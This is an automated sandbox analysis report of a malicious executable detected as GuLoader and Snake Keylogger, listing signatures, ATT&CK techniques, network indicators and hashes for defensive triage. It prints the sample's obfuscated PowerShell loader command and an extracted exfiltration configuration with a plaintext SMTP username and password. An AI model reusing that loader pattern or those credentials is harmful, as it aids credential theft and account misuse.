Windows
Analysis Report
Balance Pendiente.exe
Overview
General Information
Detection
GuLoader, Snake Keylogger
Score: 100
Range: 0 - 100
Confidence: 100%
Signatures
Early bird code injection technique detected
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected GuLoader
Yara detected Snake Keylogger
Yara detected Telegram RAT
AI detected suspicious PE digital signature
Found suspicious powershell code related to unpacking or dynamic code loading
Initial sample is a PE file and has a suspicious name
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Powershell drops PE file
Queues an APC in another process (thread injection)
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Msiexec Initiated Connection
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Classification
- System is w10x64
- Balance Pendiente.exe (PID: 6592 cmdline: "C:\Users\user\Desktop\Balance Pendiente.exe" MD5: E70E71A31781B44F850A39693784CE74)
- powershell.exe (PID: 6964 cmdline: "powershell.exe" -windowstyle minimized "$Bibrd=gc -Raw 'C:\Users\user\AppData\Roaming\Kalkvrksarbejderen84\chego\reverensens\Defmrkede\Crossbeam.Dec122';$Antiodont=$Bibrd.SubString(60335,3);.$Antiodont($Bibrd)" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
- conhost.exe (PID: 7068 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- msiexec.exe (PID: 5660 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
- cleanup
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
CloudEyE, GuLoader | CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored. | No Attribution |
404 Keylogger, Snake Keylogger | Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victim's sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram. | No Attribution |
{"Exfil Mode": "SMTP", "Username": "federico@extintoresdemir.com", "Password": "s46S2&4+", "Host": "smtp.ionos.es", "Port": "587", "Version": "4.4"}
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security | ||
JoeSecurity_SnakeKeylogger | Yara detected Snake Keylogger | Joe Security | ||
JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security | ||
JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security | ||
JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security |
System Summary |
---|
Source: | Author: frack113: |
Source: | Author: frack113, Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2025-02-25T08:27:43.138773+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.4 | 49828 | 104.21.96.1 | 443 | TCP |
2025-02-25T08:27:45.588203+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.4 | 49848 | 104.21.96.1 | 443 | TCP |
2025-02-25T08:27:46.775686+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.4 | 49855 | 104.21.96.1 | 443 | TCP |
2025-02-25T08:27:41.175108+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49812 | 158.101.44.242 | 80 | TCP |
2025-02-25T08:27:42.581340+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49812 | 158.101.44.242 | 80 | TCP |
2025-02-25T08:27:43.800116+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49830 | 158.101.44.242 | 80 | TCP |
2025-02-25T08:27:35.888216+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49770 | 172.217.18.14 | 443 | TCP |
2025-02-25T08:27:53.628181+0100 | 1810007 | 1 | Potentially Bad Traffic | 192.168.2.4 | 49905 | 149.154.167.220 | 443 | TCP |
AV Detection |
---|
Source: | Malware Configuration Extractor: |
Source: | ReversingLabs: | |||
Source: | Virustotal: | Perma Link |
Source: | Virustotal: | Perma Link | ||
Source: | ReversingLabs: |
Source: | Integrated Neural Analysis Model: |
Location Tracking |
---|
Source: | DNS query: |
Source: | Static PE information: |
Source: | HTTPS traffic detected: |
Source: | Code function: | 0_2_00405E6B | |
Source: | Code function: | 0_2_00405427 | |
Source: | Code function: | 0_2_00402647 |
Source: | File opened: | Jump to behavior |
Source: | Code function: | 6_2_02EDF2D5 | |
Source: | Code function: | 6_2_02EDF4AC | |
Source: | Code function: | 6_2_02EDF974 |
Networking |
---|
Source: | Suricata IDS: |
Source: | DNS query: |
Source: | HTTP traffic detected: |
Source: | IP Address: |
Source: | JA3 fingerprint: |
Source: | DNS query: |
Source: | Suricata IDS: |
Source: | HTTP traffic detected: |
Source: | HTTPS traffic detected: |
Source: | UDP traffic detected without corresponding DNS query: |
Source: | HTTP traffic detected: |
Source: | DNS traffic detected: |
Source: | HTTP traffic detected: |
Source: | String found in binary or memory: |
Source: | Network traffic detected: |
Source: | HTTPS traffic detected: |
Source: | Code function: | 0_2_00404F90 |
System Summary |
---|
Source: | Static PE information: |
Source: | File created: | Jump to dropped file |
Source: | Code function: | 0_2_004030B8 |
Source: | Code function: | 0_2_00406141 | |
Source: | Code function: | 0_2_004047CF | |
Source: | Code function: | 1_2_06FFBED6 | |
Source: | Code function: | 6_2_02EDD278 | |
Source: | Code function: | 6_2_02ED538A | |
Source: | Code function: | 6_2_02EDC147 | |
Source: | Code function: | 6_2_02EDC752 | |
Source: | Code function: | 6_2_02EDC468 | |
Source: | Code function: | 6_2_02EDCA22 | |
Source: | Code function: | 6_2_02EDE988 | |
Source: | Code function: | 6_2_02ED3E17 | |
Source: | Code function: | 6_2_02EDCFC2 | |
Source: | Code function: | 6_2_02EDCCF2 | |
Source: | Code function: | 6_2_02ED7118 | |
Source: | Code function: | 6_2_02ED2A77 | |
Source: | Code function: | 6_2_02EDF974 |
Source: | Static PE information: |
Source: | Static PE information: |
Source: | Classification label: |
Source: | Code function: | 0_2_00404293 |
Source: | Code function: | 0_2_00402036 |
Source: | File created: | Jump to behavior |
Source: | Mutant created: | ||
Source: | Mutant created: |
Source: | File created: | Jump to behavior |
Source: | Static PE information: |
Source: | WMI Queries: |
Source: | File read: | Jump to behavior |
Source: | Key opened: | Jump to behavior |
Source: | Virustotal: | ||
Source: | ReversingLabs: |
Source: | File read: | Jump to behavior |
Source: | Process created: | Jump to behavior |
Source: | Section loaded: | Jump to behavior |
Source: | Key value queried: | Jump to behavior |
Source: | Window detected: |
Source: | File opened: | Jump to behavior |
Data Obfuscation |
---|
Source: | File source: |
Source: | Anti Malware Scan Interface: | ||
Source: | Anti Malware Scan Interface: |
Source: | Code function: | 0_2_00405E92 |
Source: | Code function: | 1_2_06FF98CA | |
Source: | Code function: | 1_2_06FF880D | |
Source: | Code function: | 1_2_06FF4BDB | |
Source: | Code function: | 1_2_06FF4B7C | |
Source: | Code function: | 1_2_06FFAF71 | |
Source: | Code function: | 1_2_08EE28BE |
Persistence and Installation Behavior |
---|
Source: | Joe Sandbox AI: |
Source: | File created: | Jump to dropped file | ||
Source: | File created: | Jump to dropped file |
Hooking and other Techniques for Hiding and Protection |
---|
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior |
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Window / User API: | Jump to behavior | ||
Source: | Dropped PE file which has not been started: | Jump to dropped file |
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep count: | Jump to behavior | ||
Source: | Last function: |
Source: | Code function: | 0_2_00405E6B | |
Source: | Code function: | 0_2_00405427 | |
Source: | Code function: | 0_2_00402647 |
Source: | Thread delayed: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | Binary or memory string: | ||
Source: | API call chain: | graph_0-3894 | ||
Source: | API call chain: | graph_0-3755 |
Source: | Process information queried: | Jump to behavior |
Source: | Code function: | 1_2_00ADDAC0 |
Source: | Code function: | 0_2_00405E92 |
Source: | Process token adjusted: | Jump to behavior | ||
Source: | Process token adjusted: | Jump to behavior |
HIPS / PFW / Operating System Protection Evasion |
---|
Source: | Process created / APC Queued / Resumed: | Jump to behavior |
Source: | Thread APC queued: | Jump to behavior |
Source: | Memory written: | Jump to behavior |
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Code function: | 0_2_100010D3 |
Source: | Queries volume information: | Jump to behavior | ||
Source: | Code function: | 0_2_00405B89 |
Stealing of Sensitive Information |
---|
Source: | File source: |
Source: | File source: |
Source: | File opened: | Jump to behavior | ||
Source: | File source: | ||
Source: | File source: |
Remote Access Functionality |
---|
Source: | File source: |
Source: | File source: |
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 1 Windows Management Instrumentation | 1 DLL Side-Loading | 1 DLL Side-Loading | 2 Obfuscated Files or Information | 1 OS Credential Dumping | 3 File and Directory Discovery | Remote Services | 1 Archive Collected Data | 1 Web Service | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot |
Credentials | Domains | Default Accounts | 1 Native API | Boot or Logon Initialization Scripts | 311 Process Injection | 1 Software Packing | LSASS Memory | 14 System Information Discovery | Remote Desktop Protocol | 1 Data from Local System | 3 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service |
Email Addresses | DNS Server | Domain Accounts | 1 PowerShell | Logon Script (Windows) | Logon Script (Windows) | 1 DLL Side-Loading | Security Account Manager | 11 Security Software Discovery | SMB/Windows Admin Shares | 1 Email Collection | 11 Encrypted Channel | Automated Exfiltration | Data Encrypted for Impact |
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 Masquerading | NTDS | 1 Process Discovery | Distributed Component Object Model | 1 Clipboard Data | 3 Non-Application Layer Protocol | Traffic Duplication | Data Destruction |
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 21 Virtualization/Sandbox Evasion | LSA Secrets | 21 Virtualization/Sandbox Evasion | SSH | Keylogging | 14 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact |
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 311 Process Injection | Cached Domain Credentials | 1 Application Window Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Compile After Delivery | DCSync | 1 System Network Configuration Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
44% | Virustotal | Browse | ||
38% | ReversingLabs | Win32.Trojan.Generic |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | ReversingLabs | |||
0% | Virustotal | Browse | ||
38% | ReversingLabs | Win32.Trojan.Generic | ||
44% | Virustotal | Browse |
⊘No Antivirus matches
Name | IP | Active | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|---|
drive.google.com | 172.217.18.14 | true | false | high | |
drive.usercontent.google.com | 142.250.185.193 | true | false | high | |
reallyfreegeoip.org | 104.21.96.1 | true | false | high | |
api.telegram.org | 149.154.167.220 | true | false | high | |
checkip.dyndns.com | 158.101.44.242 | true | false | high | |
checkip.dyndns.org | unknown | unknown | false | high |
Name | Malicious | Antivirus Detection | Reputation |
---|---|---|---|
false | high | ||
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false | high | |||
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
142.250.185.193 | drive.usercontent.google.com | United States | 15169 | GOOGLEUS | false | |
149.154.167.220 | api.telegram.org | United Kingdom | 62041 | TELEGRAMRU | false | |
104.21.96.1 | reallyfreegeoip.org | United States | 13335 | CLOUDFLARENETUS | false | |
172.217.18.14 | drive.google.com | United States | 15169 | GOOGLEUS | false | |
158.101.44.242 | checkip.dyndns.com | United States | 31898 | ORACLE-BMC-31898US | false |
Joe Sandbox version: | 42.0.0 Malachite |
Analysis ID: | 1623448 |
Start date and time: | 2025-02-25 08:25:40 +01:00 |
Joe Sandbox product: | CloudBasic |
Overall analysis duration: | 0h 6m 38s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Cookbook file name: | default.jbs |
Analysis system description: | Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01 |
Number of new started processes analysed: | 8 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Sample name: | Balance Pendiente.exe |
Detection: | MAL |
Classification: | mal100.troj.spyw.evad.winEXE@6/15@5/5 |
EGA Information: |
HCA Information: |
Cookbook Comments: |
- Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
- Excluded IPs from analysis (whitelisted): 20.12.23.50, 13.107.246.67
- Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
- Execution Graph export aborted for target msiexec.exe, PID 5660 because it is empty
- Execution Graph export aborted for target powershell.exe, PID 6964 because it is empty
- Not all processes were analyzed, report is missing behavior information
- Report size getting too big, too many NtCreateKey calls found.
- Report size getting too big, too many NtOpenKeyEx calls found.
- Report size getting too big, too many NtQueryAttributesFile calls found.
- Report size getting too big, too many NtQueryValueKey calls found.
- Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description |
---|---|---|
02:26:38 | API Interceptor | |
02:27:41 | API Interceptor |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
149.154.167.220 | Get hash | malicious | MSIL Logger, MassLogger RAT | Browse | ||
Get hash | malicious | GuLoader, Snake Keylogger | Browse | |||
Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | |||
Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | |||
Get hash | malicious | MSIL Logger, MassLogger RAT | Browse | |||
Get hash | malicious | MSIL Logger, MassLogger RAT | Browse | |||
Get hash | malicious | GuLoader, Snake Keylogger | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | GuLoader, Snake Keylogger | Browse | |||
104.21.96.1 | Get hash | malicious | Lokibot | Browse |
Get hash | malicious | Lokibot | Browse |
Get hash | malicious | FormBook | Browse |
Get hash | malicious | Unknown | Browse |
Get hash | malicious | FormBook | Browse |
Get hash | malicious | FormBook | Browse |
Get hash | malicious | FormBook | Browse |
Get hash | malicious | FormBook | Browse |
Get hash | malicious | FormBook | Browse |
Get hash | malicious | FormBook | Browse |
158.101.44.242 | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
Get hash | malicious | CryptOne, Snake Keylogger, VIP Keylogger | Browse |
Get hash | malicious | Unknown | Browse |
Get hash | malicious | MSIL Logger | Browse |
Get hash | malicious | GuLoader, Snake Keylogger | Browse |
Get hash | malicious | GuLoader, Snake Keylogger | Browse |
Get hash | malicious | MSIL Logger, MassLogger RAT | Browse |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
checkip.dyndns.com | Get hash | malicious | MSIL Logger, MassLogger RAT | Browse |
Get hash | malicious | Snake Keylogger | Browse |
Get hash | malicious | GuLoader, Snake Keylogger | Browse |
Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
Get hash | malicious | MSIL Logger, MassLogger RAT | Browse |
Get hash | malicious | MSIL Logger, MassLogger RAT | Browse |
Get hash | malicious | MSIL Logger, MassLogger RAT | Browse |
Get hash | malicious | GuLoader, Snake Keylogger | Browse |
reallyfreegeoip.org | Get hash | malicious | MSIL Logger, MassLogger RAT | Browse |
Get hash | malicious | Snake Keylogger | Browse |
Get hash | malicious | GuLoader, Snake Keylogger | Browse |
Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
Get hash | malicious | MSIL Logger, MassLogger RAT | Browse |
Get hash | malicious | MSIL Logger, MassLogger RAT | Browse |
Get hash | malicious | MSIL Logger, MassLogger RAT | Browse |
Get hash | malicious | GuLoader, Snake Keylogger | Browse |
api.telegram.org | Get hash | malicious | MSIL Logger, MassLogger RAT | Browse |
Get hash | malicious | GuLoader, Snake Keylogger | Browse |
Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
Get hash | malicious | MSIL Logger, MassLogger RAT | Browse |
Get hash | malicious | MSIL Logger, MassLogger RAT | Browse |
Get hash | malicious | GuLoader, Snake Keylogger | Browse |
Get hash | malicious | Unknown | Browse |
Get hash | malicious | GuLoader, Snake Keylogger | Browse |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
TELEGRAMRU | Get hash | malicious | MSIL Logger, MassLogger RAT | Browse |
Get hash | malicious | GuLoader, Snake Keylogger | Browse |
Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
Get hash | malicious | LummaC Stealer | Browse |
Get hash | malicious | MSIL Logger, MassLogger RAT | Browse |
Get hash | malicious | MSIL Logger, MassLogger RAT | Browse |
Get hash | malicious | Vidar | Browse |
Get hash | malicious | GuLoader, Snake Keylogger | Browse |
Get hash | malicious | Unknown | Browse |
ORACLE-BMC-31898US | Get hash | malicious | Snake Keylogger | Browse |
Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
Get hash | malicious | MSIL Logger, MassLogger RAT | Browse |
Get hash | malicious | MSIL Logger, MassLogger RAT | Browse |
Get hash | malicious | MSIL Logger, MassLogger RAT | Browse |
Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
Get hash | malicious | MSIL Logger, MassLogger RAT | Browse |
Get hash | malicious | CryptOne, MSIL Logger, MassLogger RAT | Browse |
CLOUDFLARENETUS | Get hash | malicious | HTMLPhisher, Tycoon2FA | Browse |
Get hash | malicious | MSIL Logger, MassLogger RAT | Browse |
Get hash | malicious | Snake Keylogger | Browse |
Get hash | malicious | GuLoader, Remcos | Browse |
Get hash | malicious | GO Backdoor | Browse |
Get hash | malicious | GuLoader, Snake Keylogger | Browse |
Get hash | malicious | AsyncRAT | Browse |
Get hash | malicious | AsyncRAT, VenomRAT | Browse |
Get hash | malicious | GuLoader, Remcos | Browse |
Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
54328bd36c14bd82ddaa0c04b25ed9ad | Get hash | malicious | MSIL Logger, MassLogger RAT | Browse |
Get hash | malicious | Snake Keylogger | Browse |
Get hash | malicious | GuLoader, Snake Keylogger | Browse |
Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
Get hash | malicious | MSIL Logger, MassLogger RAT | Browse |
Get hash | malicious | MSIL Logger, MassLogger RAT | Browse |
Get hash | malicious | MSIL Logger, MassLogger RAT | Browse |
Get hash | malicious | GuLoader, Snake Keylogger | Browse |
3b5074b1b5d032e5620f69f9f700ff0e | Get hash | malicious | GhostRat | Browse |
Get hash | malicious | MSIL Logger, MassLogger RAT | Browse |
Get hash | malicious | GuLoader, Remcos | Browse |
Get hash | malicious | GuLoader, Snake Keylogger | Browse |
Get hash | malicious | AsyncRAT | Browse |
Get hash | malicious | AsyncRAT, VenomRAT | Browse |
Get hash | malicious | GuLoader, Remcos | Browse |
Get hash | malicious | Remcos, GuLoader | Browse |
Get hash | malicious | GuLoader | Browse |
Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
37f463bf4616ecd445d4a1937da06e19 | Get hash | malicious | GuLoader | Browse |
Get hash | malicious | GuLoader, Remcos | Browse |
Get hash | malicious | GuLoader, Snake Keylogger | Browse |
Get hash | malicious | GuLoader, Remcos | Browse |
Get hash | malicious | Remcos, GuLoader | Browse |
Get hash | malicious | GuLoader | Browse |
Get hash | malicious | Remcos, GuLoader | Browse |
Get hash | malicious | FormBook | Browse |
Get hash | malicious | FormBook | Browse |
Get hash | malicious | Remcos, GuLoader | Browse |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
C:\Users\user\AppData\Local\Temp\nsu1A01.tmp\nsExec.dll | | | malicious | GuLoader, Snake Keylogger | | |
C:\Users\user\AppData\Local\Temp\nsu1A01.tmp\nsExec.dll | | | malicious | GuLoader | | |
C:\Users\user\AppData\Local\Temp\nsu1A01.tmp\nsExec.dll | | | malicious | GuLoader | | |
C:\Users\user\AppData\Local\Temp\nsu1A01.tmp\nsExec.dll | | | malicious | Unknown | | |
C:\Users\user\AppData\Local\Temp\nsu1A01.tmp\nsExec.dll | | | malicious | AgentTesla, GuLoader | | |
Process: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | modified |
Size (bytes): | 53158 |
Entropy (8bit): | 5.062687652912555 |
Encrypted: | false |
SSDEEP: | 1536:N8Z+z30pPV3CNBQkj2Ph4iUx7aVKflJnqvPqdKgfSRIOdBlzStAHk4NKeCMiYoLs:iZ+z30pPV3CNBQkj2PqiU7aVKflJnqvF |
MD5: | 5D430F1344CE89737902AEC47C61C930 |
SHA1: | 0B90F23535E8CDAC8EC1139183D5A8A269C2EFEB |
SHA-256: | 395099D9A062FA7A72B73D7B354BF411DA7CFD8D6ADAA9FDBC0DD7C282348DC7 |
SHA-512: | DFC18D47703A69D44643CFC0209B785A4393F4A4C84FAC5557D996BC2A3E4F410EA6D26C66EA7F765CEC491DD52C8454CB0F538D20D2EFF09DC89DDECC0A2AFE |
Malicious: | false |
Reputation: | moderate, very likely benign file |
Preview: |
Process: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
